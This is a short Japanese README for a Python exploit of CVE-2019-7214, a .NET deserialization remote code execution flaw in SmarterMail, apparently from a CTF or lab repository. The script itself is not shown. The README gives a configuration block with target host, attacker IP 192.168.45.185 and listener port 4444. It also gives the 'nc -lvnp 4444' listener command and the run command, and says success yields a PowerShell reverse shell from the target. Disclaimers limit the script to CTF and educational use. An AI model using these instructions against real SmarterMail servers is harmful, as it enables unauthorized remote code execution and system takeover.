
CTFでの使用のみを対象としています(CVE-2019-7214は/etc/hostsからホストも解決します)
このPythonスクリプトは、リモートのWindowsマシン上で実行されている脆弱なサービスを標的とします。シリアル化された.NETペイロードを送信し、攻撃者のマシンに対してPowerShellベースのリバースシェルを起動します。
SmarterMail システムの .NET デシリアライゼーションにおけるリモートコード実行。
スクリプトの設定セクションを、お使いの環境に合わせて更新してください:
HOSTNAME = 'hostname' # Target hostname (resolved via /etc/hosts)
PORT = 9999 # Target port listening for serialized input
LHOST = '192.168.45.185' # Attacker IP (listener)
LPORT = 4444 # Attacker listening port
nc -lvnp 4444
python3 CVE-2019-7214 .py
成功すると、リスナー上でターゲットからのPowerShellプロンプトが表示されます。
System.Management.Automation 機能を含む逆シリアル化されたオブジェクトを実行できることを前提としています。このスクリプトは教育目的のみで提供されています。所有していない、または明示的なテスト許可を得ていないシステムに対する不正使用は、違法かつ非倫理的です。